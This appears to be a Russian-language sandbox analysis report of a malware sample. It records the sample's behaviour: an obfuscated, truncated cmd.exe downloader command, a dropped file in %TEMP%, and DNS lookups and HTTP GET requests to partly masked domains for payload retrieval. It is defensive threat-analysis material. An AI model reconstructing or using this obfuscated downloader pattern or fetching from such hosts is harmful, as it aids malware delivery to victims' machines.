Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK\qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\462.exe
Сетевая активность
Подключается к
- 'kh##t.org':80
- 'vi###edia.net':80
- 'vi###edia.net':443
- 'pr######persianas.com.br':80
- 'ro###lls.com':80
TCP
Запросы HTTP GET
- http://www.kh##t.org/0lz8WgN
- http://www.vi###edia.net/Hj
- http://www.pr######persianas.com.br/KD3q0VRw
- http://pr######persianas.com.br/KD3q0VRw
- http://ro###lls.com/lf
Другие
- 'vi###edia.net':443
UDP
- DNS ASK kh##t.org
- DNS ASK vi###edia.net
- DNS ASK pr######persianas.com.br
- DNS ASK bu####rtcrafts.com
- DNS ASK ro###lls.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK\qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK/qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28,26,73,41,11,0,28,14,21,69,16,28,21,71,7...
